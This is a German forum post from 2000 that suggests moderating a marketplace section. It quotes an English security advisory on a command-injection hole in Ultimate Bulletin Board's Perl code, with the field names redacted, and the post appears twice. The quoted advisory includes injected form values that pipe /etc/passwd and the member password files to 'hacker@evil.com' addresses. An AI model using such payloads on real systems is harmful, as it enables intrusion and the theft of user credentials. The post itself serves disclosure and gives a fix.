Marktplatz: Suche/Biete

Philipp · 08.05.2000, 04:19

Die Funktion mit den extra Passwort bietet UBB nur in privaten Foren.

Die Rubriken Biete und Suche könnte ja Moderiert werden und falls jemand diese Rubriken wirklich missbrauch (Kommerzielle Werbung) kann er ja gebannt werden.

Ausserdem (Off Topic) sollte die Boardsoftware aktualisiert werden da sie ein großes Sicherheitloch hat. Ich habe schon öfter darauf hingewiesen

Hier die genaue Beschreibung des Sicherheitslochs.

Wie es aber genau funktioniert poste ich nicht, da sich sonst alle womöglich Morgen via FTP einloggen

.

<BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Hello.

Writing cgi scripts in perl is simple. It's also rather safe,
providing authors follow very simple instructions. But they don't.

Browsing some site, I found that their forums were based not on home-
made scripts, but rather commercial software product. Hey, said I to
myself, remember those story about pcweek hack ? They use commercial
package photoads. Let's look what that Ultimate Bulletin Board by
Infopop is.

I grabbed freeware version from http://www.ultimatebb.com and
after 10-minutes grepping found those lines:

ubb_library.pl:

*** Gelöscht ***

And the * Gelöscht * takes its value directly from the hidden (hmm!)
field `* Gelöscht *'.

So when I filled the form with
* Gelöscht *='012345****|mail hacker@evil.com </etc/passwd|'
It happily gives me /etc/passwd. And
* Gelöscht *='012345****|cat Members/*|mail hacker@evil.org|'
shows all users of bulletin board, and their passwords too (in cleartext!).

So one should only open * Gelöscht *,
and set * Gelöscht * field to whatever he want. And this stupid UBB (at least
freeware version) doesn't keep the logs (unless, so-called, hacklog,
used when the condition above is not met).

The fix is obvious. But the rule of the thumb is "do not use magic perl open".
At least in cgi scripts. If you want to open regular file, sysopen does
the trick as well.

And again: CHECK EVERYTHING!

Regards,
SerG.

P.S. Vendor was notified.
<HR></BLOCKQUOTE>

Dieses Sicherheitsloch besteht in allen UBBs bis 5.43d und nicht nur in der Freeware Version. Ich habe es selbst auf meinen Board miterlebt.

[Diese Nachricht wurde von Philipp am 08. Mai 2000 editiert.]

08.05.2000, 04:19	#5
Philipp verXENt Registriert seit: 01.08.1999 Beiträge: 7.084 Mein Computer	Die Funktion mit den extra Passwort bietet UBB nur in privaten Foren. Die Rubriken Biete und Suche könnte ja Moderiert werden und falls jemand diese Rubriken wirklich missbrauch (Kommerzielle Werbung) kann er ja gebannt werden. Ausserdem (Off Topic) sollte die Boardsoftware aktualisiert werden da sie ein großes Sicherheitloch hat. Ich habe schon öfter darauf hingewiesen Hier die genaue Beschreibung des Sicherheitslochs. Wie es aber genau funktioniert poste ich nicht, da sich sonst alle womöglich Morgen via FTP einloggen . <BLOCKQUOTE><font size="1" face="Verdana, Arial">quote:</font><HR>Hello. Writing cgi scripts in perl is simple. It's also rather safe, providing authors follow very simple instructions. But they don't. Browsing some site, I found that their forums were based not on home- made scripts, but rather commercial software product. Hey, said I to myself, remember those story about pcweek hack ? They use commercial package photoads. Let's look what that Ultimate Bulletin Board by Infopop is. I grabbed freeware version from http://www.ultimatebb.com and after 10-minutes grepping found those lines: ubb_library.pl: * Gelöscht * And the * Gelöscht * takes its value directly from the hidden (hmm!) field `* Gelöscht '. So when I filled the form with Gelöscht ='012345**\|mail hacker@evil.com </etc/passwd\|' It happily gives me /etc/passwd. And Gelöscht ='012345**\|cat Members/\|mail hacker@evil.org\|' shows all users of bulletin board, and their passwords too (in cleartext!). So one should only open * Gelöscht , and set Gelöscht * field to whatever he want. And this stupid UBB (at least freeware version) doesn't keep the logs (unless, so-called, hacklog, used when the condition above is not met). The fix is obvious. But the rule of the thumb is "do not use magic perl open". At least in cgi scripts. If you want to open regular file, sysopen does the trick as well. And again: CHECK EVERYTHING! Regards, SerG. P.S. Vendor was notified. <HR></BLOCKQUOTE> Dieses Sicherheitsloch besteht in allen UBBs bis 5.43d und nicht nur in der Freeware Version. Ich habe es selbst auf meinen Board miterlebt. [Diese Nachricht wurde von Philipp am 08. Mai 2000 editiert.]

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)